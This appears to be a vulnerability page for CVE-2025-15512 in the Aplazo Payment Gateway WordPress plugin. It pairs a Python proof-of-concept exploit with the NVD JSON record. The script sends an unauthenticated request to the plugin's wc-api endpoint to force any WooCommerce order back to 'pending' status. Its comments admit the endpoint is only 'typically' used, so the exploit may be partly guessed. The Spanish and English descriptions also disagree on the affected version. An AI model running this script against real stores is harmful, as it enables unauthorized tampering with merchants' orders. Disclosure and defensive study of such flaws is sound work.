CVE-2025-15512

import requests # CVE-2025-15512 PoC - Unauthorized Order Status Modification # Target: WordPress with Aplazo Payment Gateway plugin <= 1.4.3 def exploit_aplazo_cve_2025_15512(target_url, order_id): """ Exploit for missing authorization in check_success_response() Allows unauthenticated attackers to modify WooCommerce order status Parameters: target_url: Base URL of the WordPress site order_id: Target WooCommerce order ID to modify """ # Construct the vulnerable endpoint # The check_success_response() function is typically called via wc-api parameter exploit_url = f"{target_url}/?wc-api=aplazo_check_success" # Payload to set order status to 'pending' # The vulnerable function accepts order_id parameter without validation payload = { 'order_id': str(order_id), 'status': 'pending' } print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting order ID: {order_id}") print(f"[*] Sending malicious request...") try: response = requests.get(exploit_url, params=payload, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[*] Check if order {order_id} status changed to 'pending'") else: print(f"[-] Unexpected response: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") # Example usage if __name__ == "__main__": target = "https://example-store.com" target_order_id = 12345 exploit_aplazo_cve_2025_15512(target, target_order_id)

{"cve": {"id": "CVE-2025-15512", "sourceIdentifier": "[email protected]", "published": "2026-01-14T07:16:14.250", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Aplazo Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the check_success_response() function in all versions up to, and including, 1.4.3. This makes it possible for unauthenticated attackers to set any WooCommerce order to `pending payment` status."}, {"lang": "es", "value": "El plugin de la pasarela de pago Aplazo para WordPress es vulnerable a la modificación no autorizada de datos debido a una comprobación de capacidad faltante en la función check_success_response() en todas las versiones hasta la 1.4.2, inclusive. Esto hace posible que atacantes no autenticados establezcan cualquier pedido de WooCommerce al estado de 'pago pendiente'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/aplazo-payment-gateway/tags/1.4.2/includes/module/class-aplazo-module.php#L206", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3457434%40aplazo-payment-gateway&new=3457434%40aplazo-payment-gateway&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/97b327cc-7a72-4cc3-a4db-a693469f6917?source=cve", "source": "[email protected]"}]}}